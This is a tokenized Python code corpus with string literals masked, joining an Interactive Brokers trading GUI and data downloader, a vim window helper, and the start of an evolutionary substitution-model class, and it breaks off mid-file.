pass <EOL> else : <EOL> try : <EOL> print ( users [ uid ] . encode ( "<STR_LIT:utf-8>" ) ) <EOL> except KeyError : <EOL> pass <EOL> if options [ '<STR_LIT>' ] : <EOL> err ( "<STR_LIT>" % ( user , len ( user_ids ) ) ) <EOL> else : <EOL> err ( "<STR_LIT>" % ( user , len ( user_ids ) ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from time import sleep <EOL> from PyQt4 . QtCore import ( SIGNAL , SLOT ) <EOL> from PyQt4 . QtGui import ( QApplication , QFileDialog , QDialog , QVBoxLayout , QHBoxLayout , QDialogButtonBox , <EOL> QTableView , QPushButton , QWidget , QLabel , QLineEdit , QGridLayout , QHeaderView ) <EOL> import ib <EOL> from ib . ext . Contract import Contract <EOL> from ib . opt import ibConnection , message <EOL> from ib . ext . Order import Order <EOL> import logger as logger <EOL> from qtpandas import DataFrameModel , TableView <EOL> from eventSystem import Sender <EOL> import numpy as np <EOL> import pandas <EOL> from pandas import DataFrame , Index <EOL> from datetime import datetime <EOL> import os <EOL> import datetime as dt <EOL> import time <EOL> priceTicks = { <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' , <NUM_LIT:6> : '<STR_LIT>' , <NUM_LIT:7> : '<STR_LIT>' , <NUM_LIT:9> : '<STR_LIT>' , <NUM_LIT> : '<STR_LIT>' } <EOL> timeFormat = "<STR_LIT>" <EOL> dateFormat = "<STR_LIT>" <EOL> def createContract ( symbol , secType = '<STR_LIT>' , exchange = '<STR_LIT>' , currency = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> contract = Contract ( ) <EOL> contract . m_symbol = symbol <EOL> contract . m_secType = secType <EOL> contract . m_exchange = exchange <EOL> contract . m_currency = currency <EOL> return contract <EOL> def _str2datetime ( s ) : <EOL> """<STR_LIT>""" <EOL> return datetime . strptime ( s , '<STR_LIT>' ) <EOL> def readActivityFlex ( fName ) : <EOL> """<STR_LIT>""" <EOL> import csv <EOL> rows = [ ] <EOL> with open ( fName , '<STR_LIT:rb>' ) as f : <EOL> reader = csv . reader ( f ) <EOL> for row in reader : <EOL> rows . append ( row ) <EOL> header = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> types = dict ( zip ( header , [ _str2datetime , str , int , float , float ] ) ) <EOL> idx = dict ( zip ( header , [ rows [ <NUM_LIT:0> ] . index ( h ) for h in header ] ) ) <EOL> data = dict ( zip ( header , [ [ ] for h in header ] ) ) <EOL> for row in rows [ <NUM_LIT:1> : ] : <EOL> print row <EOL> for col in header : <EOL> val = types [ col ] ( row [ idx [ col ] ] ) <EOL> data [ col ] . append ( val ) <EOL> return DataFrame ( data ) [ header ] . sort ( column = '<STR_LIT>' ) <EOL> class Subscriptions ( DataFrameModel , Sender ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tws = None ) : <EOL> super ( Subscriptions , self ) . __init__ ( ) <EOL> self . df = DataFrame ( ) <EOL> self . _nextId = <NUM_LIT:1> <EOL> self . _id2symbol = { } <EOL> self . _header = [ '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> if tws is not None : <EOL> tws . register ( self . priceHandler , message . TickPrice ) <EOL> tws . register ( self . accountHandler , message . UpdatePortfolio ) <EOL> def add ( self , symbol , subId = None ) : <EOL> """<STR_LIT>""" <EOL> if subId is None : <EOL> subId = self . _nextId <EOL> data = dict ( zip ( self . _header , [ subId , <NUM_LIT:0> , np . nan , np . nan , np . nan ] ) ) <EOL> row = DataFrame ( data , index = Index ( [ symbol ] ) ) <EOL> self . df = self . df . append ( row [ self . _header ] ) <EOL> self . _nextId = subId + <NUM_LIT:1> <EOL> self . _rebuildIndex ( ) <EOL> self . emit ( SIGNAL ( "<STR_LIT>" ) ) <EOL> return subId <EOL> def priceHandler ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> if priceTicks [ msg . field ] not in self . _header : <EOL> return <EOL> self . df [ priceTicks [ msg . field ] ] [ self . _id2symbol [ msg . tickerId ] ] = msg . price <EOL> col = self . _header . index ( priceTicks [ msg . field ] ) <EOL> row = self . df . index . tolist ( ) . index ( self . _id2symbol [ msg . tickerId ] ) <EOL> idx = self . createIndex ( row , col ) <EOL> self . emit ( SIGNAL ( "<STR_LIT>" ) , idx , idx ) <EOL> def accountHandler ( self , msg ) : <EOL> if msg . contract . m_symbol in self . df . index . tolist ( ) : <EOL> self . df [ '<STR_LIT>' ] [ msg . contract . m_symbol ] = msg . position <EOL> def _rebuildIndex ( self ) : <EOL> """<STR_LIT>""" <EOL> symbols = self . df . index . tolist ( ) <EOL> ids = self . df [ '<STR_LIT:id>' ] . values . tolist ( ) <EOL> self . _id2symbol = dict ( zip ( ids , symbols ) ) <EOL> def __repr__ ( self ) : <EOL> return str ( self . df ) <EOL> class Broker ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . log = logger . getLogger ( self . name ) <EOL> self . log . debug ( '<STR_LIT>' . format ( pandas . __version__ ) ) <EOL> self . contracts = { } <EOL> self . tws = ibConnection ( ) <EOL> self . nextValidOrderId = None <EOL> self . dataModel = Subscriptions ( self . tws ) <EOL> self . tws . registerAll ( self . defaultHandler ) <EOL> self . tws . register ( self . nextValidIdHandler , '<STR_LIT>' ) <EOL> self . log . debug ( '<STR_LIT>' ) <EOL> self . tws . connect ( ) <EOL> self . tws . reqAccountUpdates ( True , '<STR_LIT>' ) <EOL> def subscribeStk ( self , symbol , secType = '<STR_LIT>' , exchange = '<STR_LIT>' , currency = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . log . debug ( '<STR_LIT>' + symbol ) <EOL> c = Contract ( ) <EOL> c . m_symbol = symbol <EOL> c . m_secType = secType <EOL> c . m_exchange = exchange <EOL> c . m_currency = currency <EOL> subId = self . dataModel . add ( symbol ) <EOL> self . tws . reqMktData ( subId , c , '<STR_LIT>' , False ) <EOL> self . contracts [ symbol ] = c <EOL> return subId <EOL> @ property <EOL> def data ( self ) : <EOL> return self . dataModel . df <EOL> def placeOrder ( self , symbol , shares , limit = None , exchange = '<STR_LIT>' , transmit = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> if symbol not in self . contracts . keys ( ) : <EOL> self . log . error ( "<STR_LIT>" % symbol ) <EOL> return <EOL> action = { - <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:1> : '<STR_LIT>' } <EOL> o = Order ( ) <EOL> o . m_orderId = self . getOrderId ( ) <EOL> o . m_action = action [ cmp ( shares , <NUM_LIT:0> ) ] <EOL> o . m_totalQuantity = abs ( shares ) <EOL> o . m_transmit = transmit <EOL> if limit is not None : <EOL> o . m_orderType = '<STR_LIT>' <EOL> o . m_lmtPrice = limit <EOL> self . log . debug ( '<STR_LIT>' % ( o . m_action , o . m_totalQuantity , symbol , o . m_orderId ) ) <EOL> self . tws . placeOrder ( o . m_orderId , self . contracts [ symbol ] , o ) <EOL> def getOrderId ( self ) : <EOL> self . nextValidOrderId += <NUM_LIT:1> <EOL> return self . nextValidOrderId - <NUM_LIT:1> <EOL> def unsubscribeStk ( self , symbol ) : <EOL> self . log . debug ( '<STR_LIT>' ) <EOL> def disconnect ( self ) : <EOL> self . tws . disconnect ( ) <EOL> def __del__ ( self ) : <EOL> """<STR_LIT>""" <EOL> print '<STR_LIT>' <EOL> self . tws . disconnect ( ) <EOL> def debugHandler ( self , msg ) : <EOL> print msg <EOL> def defaultHandler ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> if msg . typeName == '<STR_LIT>' : <EOL> self . log . error ( msg ) <EOL> def nextValidIdHandler ( self , msg ) : <EOL> self . nextValidOrderId = msg . orderId <EOL> self . log . debug ( '<STR_LIT>' . format ( self . nextValidOrderId ) ) <EOL> def saveData ( self , fname ) : <EOL> """<STR_LIT>""" <EOL> self . log . debug ( "<STR_LIT>" . format ( fname ) ) <EOL> self . dataModel . df . to_csv ( fname ) <EOL> class _HistDataHandler ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , tws ) : <EOL> self . _log = logger . getLogger ( '<STR_LIT>' ) <EOL> tws . register ( self . msgHandler , message . HistoricalData ) <EOL> self . reset ( ) <EOL> def reset ( self ) : <EOL> self . _log . debug ( '<STR_LIT>' ) <EOL> self . dataReady = False <EOL> self . _timestamp = [ ] <EOL> self . _data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT:count>' : [ ] , '<STR_LIT>' : [ ] } <EOL> def msgHandler ( self , msg ) : <EOL> if msg . date [ : <NUM_LIT:8> ] == '<STR_LIT>' : <EOL> self . _log . debug ( '<STR_LIT>' ) <EOL> self . dataReady = True <EOL> return <EOL> if len ( msg . date ) > <NUM_LIT:8> : <EOL> self . _timestamp . append ( dt . datetime . strptime ( msg . date , timeFormat ) ) <EOL> else : <EOL> self . _timestamp . append ( dt . datetime . strptime ( msg . date , dateFormat ) ) <EOL> for k in self . _data . keys ( ) : <EOL> self . _data [ k ] . append ( getattr ( msg , k ) ) <EOL> @ property <EOL> def data ( self ) : <EOL> """<STR_LIT>""" <EOL> df = DataFrame ( data = self . _data , index = Index ( self . _timestamp ) ) <EOL> return df <EOL> class Downloader ( object ) : <EOL> def __init__ ( self , debug = False ) : <EOL> self . _log = logger . getLogger ( '<STR_LIT>' ) <EOL> self . _log . debug ( <EOL> '<STR_LIT>' . format ( pandas . __version__ , ib . version ) ) <EOL> self . tws = ibConnection ( ) <EOL> self . _dataHandler = _HistDataHandler ( self . tws ) <EOL> if debug : <EOL> self . tws . registerAll ( self . _debugHandler ) <EOL> self . tws . unregister ( self . _debugHandler , message . HistoricalData ) <EOL> self . _log . debug ( '<STR_LIT>' ) <EOL> self . tws . connect ( ) <EOL> self . _timeKeeper = TimeKeeper ( ) <EOL> self . _reqId = <NUM_LIT:1> <EOL> def _debugHandler ( self , msg ) : <EOL> print '<STR_LIT>' , msg <EOL> def requestData ( self , contract , endDateTime , durationStr = '<STR_LIT>' , barSizeSetting = '<STR_LIT>' , whatToShow = '<STR_LIT>' , <EOL> useRTH = <NUM_LIT:1> , formatDate = <NUM_LIT:1> ) : <EOL> self . _log . debug ( '<STR_LIT>' % ( contract . m_symbol , endDateTime ) ) <EOL> while self . _timeKeeper . nrRequests ( timeSpan = <NUM_LIT> ) > <NUM_LIT> : <EOL> print '<STR_LIT>' <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> self . _timeKeeper . addRequest ( ) <EOL> self . _dataHandler . reset ( ) <EOL> self . tws . reqHistoricalData ( self . _reqId , contract , endDateTime , durationStr , barSizeSetting , whatToShow , useRTH , <EOL> formatDate ) <EOL> self . _reqId += <NUM_LIT:1> <EOL> startTime = time . time ( ) <EOL> timeout = <NUM_LIT:3> <EOL> while not self . _dataHandler . dataReady and ( time . time ( ) - startTime < timeout ) : <EOL> sleep ( <NUM_LIT:2> ) <EOL> if not self . _dataHandler . dataReady : <EOL> self . _log . error ( '<STR_LIT>' ) <EOL> print self . _dataHandler . data <EOL> return self . _dataHandler . data <EOL> def getIntradayData ( self , contract , dateTuple ) : <EOL> """<STR_LIT>""" <EOL> openTime = dt . datetime ( * dateTuple ) + dt . timedelta ( hours = <NUM_LIT:16> ) <EOL> closeTime = dt . datetime ( * dateTuple ) + dt . timedelta ( hours = <NUM_LIT> ) <EOL> timeRange = pandas . date_range ( openTime , closeTime , freq = '<STR_LIT>' ) <EOL> datasets = [ ] <EOL> for t in timeRange : <EOL> datasets . append ( self . requestData ( contract , t . strftime ( timeFormat ) ) ) <EOL> return pandas . concat ( datasets ) <EOL> def disconnect ( self ) : <EOL> self . tws . disconnect ( ) <EOL> class TimeKeeper ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _log = logger . getLogger ( '<STR_LIT>' ) <EOL> dataDir = os . path . expanduser ( '<STR_LIT>' ) + '<STR_LIT>' <EOL> if not os . path . exists ( dataDir ) : <EOL> os . mkdir ( dataDir ) <EOL> self . _timeFormat = "<STR_LIT>" <EOL> self . dataFile = os . path . normpath ( os . path . join ( dataDir , '<STR_LIT>' ) ) <EOL> self . _log . debug ( '<STR_LIT>' . format ( self . dataFile ) ) <EOL> def addRequest ( self ) : <EOL> """<STR_LIT>""" <EOL> with open ( self . dataFile , '<STR_LIT:a>' ) as f : <EOL> f . write ( dt . datetime . now ( ) . strftime ( self . _timeFormat ) + '<STR_LIT:\n>' ) <EOL> def nrRequests ( self , timeSpan = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> delta = dt . timedelta ( seconds = timeSpan ) <EOL> now = dt . datetime . now ( ) <EOL> requests = <NUM_LIT:0> <EOL> with open ( self . dataFile , '<STR_LIT:r>' ) as f : <EOL> lines = f . readlines ( ) <EOL> for line in lines : <EOL> if now - dt . datetime . strptime ( line . strip ( ) , self . _timeFormat ) < delta : <EOL> requests += <NUM_LIT:1> <EOL> if requests == <NUM_LIT:0> : <EOL> open ( self . dataFile , '<STR_LIT:w>' ) . close ( ) <EOL> self . _log . debug ( '<STR_LIT>' . format ( requests ) ) <EOL> return requests <EOL> def dummyHandler ( msg ) : <EOL> print msg <EOL> def testConnection ( ) : <EOL> """<STR_LIT>""" <EOL> tws = ibConnection ( ) <EOL> tws . registerAll ( dummyHandler ) <EOL> tws . connect ( ) <EOL> c = createContract ( '<STR_LIT>' ) <EOL> tws . reqMktData ( <NUM_LIT:1> , c , '<STR_LIT>' , False ) <EOL> sleep ( <NUM_LIT:3> ) <EOL> print '<STR_LIT>' <EOL> def testSubscriptions ( ) : <EOL> s = Subscriptions ( ) <EOL> s . add ( '<STR_LIT>' ) <EOL> print s <EOL> def testBroker ( ) : <EOL> b = Broker ( ) <EOL> sleep ( <NUM_LIT:2> ) <EOL> b . subscribeStk ( '<STR_LIT>' ) <EOL> b . subscribeStk ( '<STR_LIT>' ) <EOL> b . subscribeStk ( '<STR_LIT>' ) <EOL> b . placeOrder ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> ) <EOL> sleep ( <NUM_LIT:3> ) <EOL> return b <EOL> class AddSubscriptionDlg ( QDialog ) : <EOL> def __init__ ( self , parent = None ) : <EOL> super ( AddSubscriptionDlg , self ) . __init__ ( parent ) <EOL> symbolLabel = QLabel ( '<STR_LIT>' ) <EOL> self . symbolEdit = QLineEdit ( ) <EOL> secTypeLabel = QLabel ( '<STR_LIT>' ) <EOL> self . secTypeEdit = QLineEdit ( '<STR_LIT>' ) <EOL> exchangeLabel = QLabel ( '<STR_LIT>' ) <EOL> self . exchangeEdit = QLineEdit ( '<STR_LIT>' ) <EOL> currencyLabel = QLabel ( '<STR_LIT>' ) <EOL> self . currencyEdit = QLineEdit ( '<STR_LIT>' ) <EOL> buttonBox = QDialogButtonBox ( QDialogButtonBox . Ok | <EOL> QDialogButtonBox . Cancel ) <EOL> lay = QGridLayout ( ) <EOL> lay . addWidget ( symbolLabel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . symbolEdit , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> lay . addWidget ( secTypeLabel , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . secTypeEdit , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> lay . addWidget ( exchangeLabel , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . exchangeEdit , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> lay . addWidget ( currencyLabel , <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> lay . addWidget ( self . currencyEdit , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> lay . addWidget ( buttonBox , <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . setLayout ( lay ) <EOL> self . connect ( buttonBox , SIGNAL ( "<STR_LIT>" ) , <EOL> self , SLOT ( "<STR_LIT>" ) ) <EOL> self . connect ( buttonBox , SIGNAL ( "<STR_LIT>" ) , <EOL> self , SLOT ( "<STR_LIT>" ) ) <EOL> self . setWindowTitle ( "<STR_LIT>" ) <EOL> class BrokerWidget ( QWidget ) : <EOL> def __init__ ( self , broker , parent = None ) : <EOL> super ( BrokerWidget , self ) . __init__ ( parent ) <EOL> self . broker = broker <EOL> self . dataTable = TableView ( ) <EOL> self . dataTable . setModel ( self . broker . dataModel ) <EOL> self . dataTable . horizontalHeader ( ) . setResizeMode ( QHeaderView . Stretch ) <EOL> dataLabel = QLabel ( '<STR_LIT>' ) <EOL> dataLabel . setBuddy ( self . dataTable ) <EOL> dataLayout = QVBoxLayout ( ) <EOL> dataLayout . addWidget ( dataLabel ) <EOL> dataLayout . addWidget ( self . dataTable ) <EOL> addButton = QPushButton ( "<STR_LIT>" ) <EOL> saveDataButton = QPushButton ( "<STR_LIT>" ) <EOL> buttonLayout = QVBoxLayout ( ) <EOL> buttonLayout . addWidget ( addButton ) <EOL> buttonLayout . addWidget ( saveDataButton ) <EOL> buttonLayout . addStretch ( ) <EOL> layout = QHBoxLayout ( ) <EOL> layout . addLayout ( dataLayout ) <EOL> layout . addLayout ( buttonLayout ) <EOL> self . setLayout ( layout ) <EOL> self . connect ( addButton , SIGNAL ( '<STR_LIT>' ) , self . addSubscription ) <EOL> self . connect ( saveDataButton , SIGNAL ( '<STR_LIT>' ) , self . saveData ) <EOL> def addSubscription ( self ) : <EOL> dialog = AddSubscriptionDlg ( self ) <EOL> if dialog . exec_ ( ) : <EOL> self . broker . subscribeStk ( str ( dialog . symbolEdit . text ( ) ) , str ( dialog . secTypeEdit . text ( ) ) , <EOL> str ( dialog . exchangeEdit . text ( ) ) , str ( dialog . currencyEdit . text ( ) ) ) <EOL> def saveData ( self ) : <EOL> """<STR_LIT>""" <EOL> fname = unicode ( QFileDialog . getSaveFileName ( self , caption = "<STR_LIT>" , filter = '<STR_LIT>' ) ) <EOL> if fname : <EOL> self . broker . saveData ( fname ) <EOL> class Form ( QDialog ) : <EOL> def __init__ ( self , parent = None ) : <EOL> super ( Form , self ) . __init__ ( parent ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . setWindowTitle ( '<STR_LIT>' ) <EOL> self . broker = Broker ( ) <EOL> self . broker . subscribeStk ( '<STR_LIT>' ) <EOL> self . broker . subscribeStk ( '<STR_LIT>' ) <EOL> self . broker . subscribeStk ( '<STR_LIT>' ) <EOL> brokerWidget = BrokerWidget ( self . broker , self ) <EOL> lay = QVBoxLayout ( ) <EOL> lay . addWidget ( brokerWidget ) <EOL> self . setLayout ( lay ) <EOL> def startGui ( ) : <EOL> app = QApplication ( sys . argv ) <EOL> form = Form ( ) <EOL> form . show ( ) <EOL> app . exec_ ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import ib <EOL> print '<STR_LIT>' , ib . version <EOL> print message . messageTypeNames ( ) <EOL> startGui ( ) <EOL> print '<STR_LIT>' </s>
<s> import vim <EOL> def focus ( winnr ) : <EOL> vim . command ( '<STR_LIT>' % winnr ) <EOL> def close ( winnr ) : <EOL> focus ( winnr ) <EOL> vim . command ( '<STR_LIT>' ) <EOL> def close_all ( ) : <EOL> for winnr in range ( len ( vim . windows ) - <NUM_LIT:1> ) : <EOL> close ( winnr ) <EOL> def split ( ) : <EOL> vim . command ( '<STR_LIT>' ) <EOL> def vsplit ( ) : <EOL> vim . command ( '<STR_LIT>' ) <EOL> def currentnr ( ) : <EOL> return int ( vim . eval ( '<STR_LIT>' ) ) <EOL> def pos ( ) : <EOL> return vim . current . window . cursor <EOL> class remain : <EOL> def __enter__ ( self ) : <EOL> self . curwindow = currentnr ( ) <EOL> self . pos = pos ( ) <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> focus ( self . curwindow ) <EOL> vim . current . window . cursor = self . pos </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> from copy import deepcopy <EOL> from matrix_builder import * <EOL> from genetics import * <EOL> from parameters_sanity import * <EOL> from scipy . stats import gamma <EOL> from scipy . special import gammainc <EOL> import warnings <EOL> ZERO = <NUM_LIT> <EOL> MOLECULES = Genetics ( ) <EOL> class Model ( ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , model_type , parameters = None , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> self . model_type = model_type . lower ( ) <EOL> if parameters is None : <EOL> self . params = { } <EOL> else : <EOL> self . params = parameters <EOL> self . name = kwargs . get ( '<STR_LIT:name>' , None ) <EOL> self . rate_probs = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . rate_factors = kwargs . get ( '<STR_LIT>' , np . ones ( <NUM_LIT:1> ) ) <EOL> self . alpha = kwargs . get ( '<STR_LIT>' , None ) <EOL> self . k_gamma = kwargs . get ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> self . pinv = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0.> ) <EOL> self . _save_custom_matrix_freqs = kwargs . get ( '<STR_LIT>' , "<STR_LIT>" ) <EOL> self . code = None <EOL> self . aa_models = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _check_acceptable_model ( ) <EOL> self . _check_hetcodon_model ( ) <EOL> self . _construct_model ( ) <EOL> def _assign_code ( self ) : <EOL> '''<STR_LIT>''' <EOL> if "<STR_LIT:code>" in self . params : <EOL> self . code = self . params [ "<STR_LIT:code>" ] <EOL> else : <EOL> dim = len ( self . params [ '<STR_LIT>' ] ) <EOL> if dim == <NUM_LIT:4> : <EOL> self . code = MOLECULES . nucleotides <EOL> elif dim == <NUM_LIT:20> : <EOL> self . code = MOLECULES . amino_acids <EOL> elif dim == <NUM_LIT> : <EOL> self . code = MOLECULES . codons <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _check_acceptable_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . model_type = self . model_type . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> accepted_models = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] + self . aa_models <EOL> assert ( self . model_type in accepted_models ) , "<STR_LIT>" <EOL> assert ( type ( self . params ) is dict ) , "<STR_LIT>" <EOL> if self . model_type == '<STR_LIT>' : <EOL> self . model_type = '<STR_LIT>' <EOL> print ( "<STR_LIT>" ) <EOL> if self . model_type == '<STR_LIT>' : <EOL> self . model_type = '<STR_LIT>' <EOL> print ( "<STR_LIT>" ) <EOL> if self . model_type == '<STR_LIT>' : <EOL> assert ( "<STR_LIT>" in self . params ) , "<STR_LIT>" <EOL> if "<STR_LIT>" in self . params : <EOL> warn ( "<STR_LIT>" , self . _save_custom_matrix_freqs , "<STR_LIT:.>" ) <EOL> def _check_hetcodon_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . hetcodon_model = False <EOL> if "<STR_LIT>" in self . params : <EOL> self . params [ "<STR_LIT>" ] = self . params [ "<STR_LIT>" ] <EOL> self . params . pop ( "<STR_LIT>" ) <EOL> try : <EOL> ( x for x in self . params [ "<STR_LIT>" ] ) <EOL> self . hetcodon_model = True <EOL> except : <EOL> self . hetcodon_model = False <EOL> def _construct_model ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . hetcodon_model : <EOL> self . _assign_rate_probs ( ) <EOL> else : <EOL> self . _assign_rates ( ) <EOL> self . _assign_matrix ( ) <EOL> self . _assign_code ( ) <EOL> def _assign_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . model_type == '<STR_LIT>' : <EOL> self . params = Nucleotide_Sanity ( self . model_type , self . params , size = <NUM_LIT:4> ) ( ) <EOL> self . matrix = Nucleotide_Matrix ( self . model_type , self . params ) ( ) <EOL> elif self . model_type in self . aa_models : <EOL> self . params = AminoAcid_Sanity ( self . model_type , self . params , size = <NUM_LIT:20> ) ( ) <EOL> self . matrix = AminoAcid_Matrix ( self . model_type , self . params ) ( ) <EOL> elif self . model_type == '<STR_LIT>' or self . model_type == '<STR_LIT>' : <EOL> self . params = MechCodon_Sanity ( self . model_type , self . params , size = <NUM_LIT> , hetcodon_model = self . hetcodon_model ) ( ) <EOL> if self . hetcodon_model : <EOL> self . _assign_hetcodon_model_matrices ( ) <EOL> else : <EOL> self . matrix = MechCodon_Matrix ( self . model_type , self . params ) ( ) <EOL> elif '<STR_LIT>' in self . model_type : <EOL> self . params = ECM_Sanity ( self . model_type , self . params , size = <NUM_LIT> ) ( ) <EOL> self . matrix = ECM_Matrix ( self . model_type , self . params ) ( ) <EOL> elif self . model_type == '<STR_LIT>' : <EOL> self . params = MutSel_Sanity ( self . model_type , self . params ) ( ) <EOL> self . matrix = MutSel_Matrix ( self . model_type , self . params ) ( ) <EOL> if not self . params [ "<STR_LIT>" ] : <EOL> self . _calculate_state_freqs_from_matrix ( ) <EOL> elif self . model_type == '<STR_LIT>' : <EOL> self . _assign_custom_matrix ( ) <EOL> self . _calculate_state_freqs_from_matrix ( ) <EOL> np . savetxt ( self . _save_custom_matrix_freqs , self . params [ "<STR_LIT>" ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> assert ( "<STR_LIT>" in self . params ) , "<STR_LIT>" <EOL> def _assign_custom_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> custom_matrix = np . array ( self . params [ '<STR_LIT>' ] ) <EOL> if "<STR_LIT:code>" in self . params : <EOL> assert ( type ( self . params [ "<STR_LIT:code>" ] ) is list ) , "<STR_LIT>" <EOL> for item in self . params [ "<STR_LIT:code>" ] : <EOL> assert ( type ( item ) is str ) , "<STR_LIT>" <EOL> dim = len ( self . params [ "<STR_LIT:code>" ] ) <EOL> assert ( custom_matrix . shape == ( dim , dim ) ) , "<STR_LIT>" <EOL> else : <EOL> assert ( custom_matrix . shape == ( <NUM_LIT:4> , <NUM_LIT:4> ) or custom_matrix . shape == ( <NUM_LIT:20> , <NUM_LIT:20> ) or custom_matrix . shape == ( <NUM_LIT> , <NUM_LIT> ) ) , "<STR_LIT>" <EOL> dim = custom_matrix . shape [ <NUM_LIT:0> ] <EOL> assert ( np . allclose ( np . zeros ( dim ) , np . sum ( custom_matrix , <NUM_LIT:1> ) , rtol = <NUM_LIT> ) ) , "<STR_LIT>" <EOL> for s in range ( dim ) : <EOL> temp_sum = np . sum ( custom_matrix [ s ] ) - np . sum ( custom_matrix [ s ] [ s ] ) <EOL> custom_matrix [ s ] [ s ] = - <NUM_LIT:1.> * temp_sum <EOL> assert ( abs ( np . sum ( custom_matrix [ s ] ) ) <= ZERO ) , "<STR_LIT>" <EOL> self . matrix = custom_matrix <EOL> def _assign_hetcodon_model_matrices ( self ) : <EOL> '''<STR_LIT>''' <EOL> dnds_values = np . array ( self . params [ "<STR_LIT>" ] ) / np . array ( self . params [ "<STR_LIT>" ] ) <EOL> self . params [ "<STR_LIT>" ] = np . average ( dnds_values , weights = self . rate_probs ) <EOL> self . matrix = [ ] <EOL> for i in range ( len ( self . params [ '<STR_LIT>' ] ) ) : <EOL> temp_params = deepcopy ( self . params ) <EOL> temp_params [ '<STR_LIT>' ] = self . params [ '<STR_LIT>' ] [ i ] <EOL> temp_params [ '<STR_LIT>' ] = self . params [ '<STR_LIT>' ] [ i ] <EOL> mb = MechCodon_Matrix ( self . model_type , temp_params ) <EOL> self . matrix . append ( mb ( ) ) <EOL> assert ( len ( self . matrix ) > <NUM_LIT:0> ) , "<STR_LIT>" <EOL> def _calculate_state_freqs_from_matrix ( self ) : <EOL> '''<STR_LIT>''' <EOL> size = self . matrix . shape [ <NUM_LIT:0> ] <EOL> ( w , v ) = linalg . eig ( self . matrix , left = True , right = False ) <EOL> max_i = np . argmax ( w ) <EOL> max_w = w [ max_i ] <EOL> assert ( abs ( max_w ) <= ZERO ) , "<STR_LIT>" <EOL> max_v = v [ : , max_i ] <EOL> max_v /= np . sum ( max_v ) <EOL> eq_freqs = max_v . real <EOL> eq_freqs [ eq_freqs == <NUM_LIT:0.> ] = ZERO <EOL> assert ( abs ( <NUM_LIT:1.> - np . sum ( eq_freqs ) ) <= ZERO ) , "<STR_LIT>" <EOL> assert np . allclose ( np . zeros ( size ) , np . dot ( eq_freqs , self . matrix ) ) , "<STR_LIT>" <EOL> pi_inv = np . diag ( <NUM_LIT:1.0> / eq_freqs ) <EOL> s = np . dot ( self . matrix , pi_inv ) <EOL> assert np . allclose ( self . matrix , np . dot ( s , np . diag ( eq_freqs ) ) , atol = ZERO , rtol = <NUM_LIT> ) , "<STR_LIT>" <EOL> assert ( not np . allclose ( eq_freqs , np . zeros ( size ) ) ) , "<STR_LIT>" <EOL> self . params [ "<STR_LIT>" ] = eq_freqs <EOL> def _assign_rates ( self ) : <EOL> '''<STR_LIT>''' <EOL> if "<STR_LIT>" in self . model_type : <EOL> self . rate_probs = np . ones ( <NUM_LIT:1> ) <EOL> else : <EOL> if self . alpha is not None : <EOL> assert ( self . pinv >= <NUM_LIT:0.> and self . pinv <= <NUM_LIT:1.> ) , "<STR_LIT>" <EOL> self . _draw_gamma_rates ( ) <EOL> else : <EOL> self . _assign_rate_probs ( ) <EOL> self . _sanity_rate_factors ( ) <EOL> def _draw_gamma_rates ( self ) : <EOL> '''<STR_LIT>''' <EOL> if self . rate_probs is not None : <EOL> warn ( 